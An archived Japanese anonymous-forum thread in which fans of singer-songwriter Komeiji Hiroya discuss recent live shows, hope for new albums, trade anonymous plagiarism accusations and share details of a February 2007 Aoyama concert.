339 :NO MUSIC NO NAME:2006/11/23(木) 12:54:31 ID:5gXD1hGG
ミスしたね。残念。

340 :NO MUSIC NO NAME:2006/11/24(金) 13:50:11 ID:HkGvWn7z
もうこのスレいらないんじゃね

341 :NO MUSIC NO NAME:2006/11/25(土) 19:30:31 ID:GHPMfe4x
>>338
個人的にはここ数年のベストでしたよ。
久しぶりのバンドももちろん良かったけど、弾き語りがすごかったです!
鬼気迫る弾き語りとは対称的にバンド編は歌うことを楽しんでる感じでした。

こういう形のワンマンは良いですね。またやってほしいです。

342 :NO MUSIC NO NAME:2006/12/01(金) 21:59:04 ID:nWeN2/6w
バンド編成のライブはじめて見ました。
弾き語りとはまた違った迫力があって格好よかった!
年に何度がバンドでやってくれたらうれしいな。

343 :NO MUSIC NO NAME:2006/12/02(土) 23:59:38 ID:Xh6caY+1
この人には地道に良い音楽を作り続けてほしい。

344 :NO MUSIC NO NAME:2006/12/05(火) 00:52:21 ID:ulIQybNG

たしかにそうですね。しかしもうちょっとアルバムを出して欲しい

345 :NO MUSIC NO NAME:2006/12/12(火) 23:53:59 ID:Ks+Q/P+m

たしかにそうですね。でもどれだけ待たされてもいい。
とにかく凄いアルバムを作ってもらいたい。

346 :NO MUSIC NO NAME:2006/12/18(月) 04:15:55 ID:k9qI6ZsT
でも、あんまり長いこと音源出さないと、世間からは忘れ去られてしまうわけで。
すでに・・・。


347 :NO MUSIC NO NAME:2006/12/22(金) 16:37:36 ID:BaF1g2R4
今日ライブだっつーに、またもや仕事で行けない。
今年はとうとう見ずじまいだったなぁ(>_<)
来年は行けますように!

348 :NO MUSIC NO NAME:2006/12/22(金) 23:48:37 ID:wSMh6VtV
この人、結構パクってるよな・・・

自分で薦めてたアクアラングとか・・・

349 :NO MUSIC NO NAME:2006/12/23(土) 03:56:34 ID:NNz+1y07
>>348
具体的に教えて。この曲が、この曲を、みたいに

350 :NO MUSIC NO NAME:2006/12/23(土) 17:48:51 ID:mRmszKS1
いちいちメモってないしこの人の熱狂的なファンでもないからあれだけど・・・

とりあえず

Aqualungのstrange & beautiful(i’ll put a spell on you) がこの人の何かの曲(タイトル覚えてない)の元ネタ

あとこの人のサビがI'ts not up to youって歌詞の曲も何か元ネタあった

351 :NO MUSIC NO NAME:2006/12/30(土) 20:52:23 ID:MU0X9A2q
ダミアンライズもよくパクってるよ。
サプライズというにも程があるよな。
あんまりこういうのがあると、正直萎える。
いいものたくさん持ってる筈なのに、
あれもこれもパクってんの?って疑いたくなっちゃうじゃん。
何だかね。

352 : 【大凶】 【427円】 :2007/01/01(月) 00:28:14 ID:4WVIS5dN
今年はがんばれ、古明地

353 : 【大吉】 【230円】 :2007/01/01(月) 00:28:49 ID:4WVIS5dN
orz

354 :NO MUSIC NO NAME:2007/01/09(火) 17:20:52 ID:qlUk8u7m
途切れることなくたくさんライブやってるね

近くに来ないので行けないけど

355 :NO MUSIC NO NAME:2007/01/10(水) 22:18:55 ID:Z7Cepomk
利益が出てて、そのままCD化だったら嬉しい

356 :NO MUSIC NO NAME:2007/01/15(月) 17:26:07 ID:6uPiBUgf
26日、誰も行かんの?
ワンマンじゃないが久々だしなー…
ってトークだけならどうしよぅ

357 :NO MUSIC NO NAME:2007/01/15(月) 23:36:29 ID:62HHdY3C
能楽堂ライブ行ってきました。40分位のステージだったけど凄く良かった!
ルックスも前に見た時より痩せてて、シャープでかっこよかったです!

>>356さん
CD即売会の時にちょっと話したけど、26日は普通にライブみたいですよ。
でも私は東北住みだから行けないです(涙)。

358 :NO MUSIC NO NAME:2007/01/17(水) 16:31:44 ID:QxtXmE/b
>>357
サンクス。じゃあ期待して行こうっと。

359 :NO MUSIC NO NAME:2007/01/19(金) 17:21:17 ID:GInmKuAp
昔ラジオで、ハウスオブラブかなんかの一曲を凄い絶賛していて
その話のあと弾き語りで披露したことあったけどあれ何て曲だっけ

360 :NO MUSIC NO NAME:2007/01/19(金) 18:34:58 ID:GInmKuAp
自己解決しました
オトゥールズだったか

361 :NO MUSIC NO NAME:2007/01/25(木) 02:23:47 ID:mTsDkOS9
明後日行けなくなっちゃった(;_;)
2年ぶりのライブだったのに。次はいつだ(T_T)

362 :NO MUSIC NO NAME:2007/01/26(金) 03:26:56 ID:Pki9Gczj
>>361
二月の青山があるジャマイカ。

363 :NO MUSIC NO NAME:2007/01/27(土) 11:29:21 ID:KV+G3D2m
やっとFM那覇の番組のポッドキャストが更新された
わー、なんかすごいいい番組だ
ttp://uruma.ap.teacup.com/magical/213.html

364 :NO MUSIC NO NAME:2007/01/30(火) 00:43:31 ID:aLBxSkqu
>>362
いつ?

365 :NO MUSIC NO NAME:2007/01/30(火) 15:26:11 ID:y1P1g6Lh
>>364
362じゃないけど2月18日日曜だよ。ツーマンライヴ。

366 :NO MUSIC NO NAME:2007/02/02(金) 17:35:36 ID:kMJ/uk6l
ポッドキャスト聞いたけど、あれはないんじゃないかな。
あのおばさま喋りすぎ。コメイジの話なんてまとめて数分じゃん。
音楽の話もほとんどないし。だからと言っておもしろいところもなかったし。
沖縄はあんなもんなのかな?

367 :NO MUSIC NO NAME:2007/02/15(木) 11:01:55 ID:JWuv7mhv
そろそろコメイジイベントなんだが俺は楽しみだ。
コメイジらしい良いメンツ呼んでるし。

368 :NO MUSIC NO NAME:2007/02/15(木) 19:36:52 ID:6b/PQb3Q
古明地洋哉 presents "ENDLESS WALTZ" vol.4@青山月見ル君想フ
 【古明地洋哉 presents "ENDLESS WALTZ" vol.4 古明地洋哉×高畠俊太郎(AUTO PILOT)】
  2007年2月18日(日)18:30open / 19:30start
  ticket:adv\3000 / door\3500(w/o 1drink)
  ※店頭発売:2月17日22:00迄

369 :新参:2007/02/16(金) 00:50:23 ID:6vPqJaGR
いつもどのくらいの客入ですか?
当日券狙いなんですけど、大丈夫っすかね?

370 :NO MUSIC NO NAME:2007/02/16(金) 01:17:55 ID:Pl5wtpwF
>>369
近藤さんとのときと前回は会場にまんべんなくイスがあって全員が座れるくらい
けど二階?は立ち見でした
今回は行かれないので楽しんできてくださいね!d(^ ^)b

371 :新参:2007/02/16(金) 02:26:52 ID:6vPqJaGR
わ〜早速のレスありがとうございます
二階もあるんすね
青山なんてオサレなとこ行くの初めてなんで緊張するけど楽しみです

372 :NO MUSIC NO NAME:2007/02/18(日) 23:26:34 ID:ae6Lpv/u
行ってきたよ。
まさか「こころ」と「アクロバット」やるとは思わなんだ。
サイトの曲もやってたし、かなーりまったりのんびりモードで、楽しかった。
歌い始めた「墜落」を取り消して「FA*K YOU」に仕切直したり。
終始笑顔だった。

373 :NO MUSIC NO NAME:2007/02/20(火) 21:47:48 ID:oF9jnWQH
「love song」を久しぶりに聞けたのがよかった。
しかもエレキの弾き語り!
初めてだったみたいだけど、結構様になってて格好よかったです。

374 :NO MUSIC NO NAME:2007/02/23(金) 22:56:21 ID:PDVzUH4s
mind gameやったのかー。

64 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)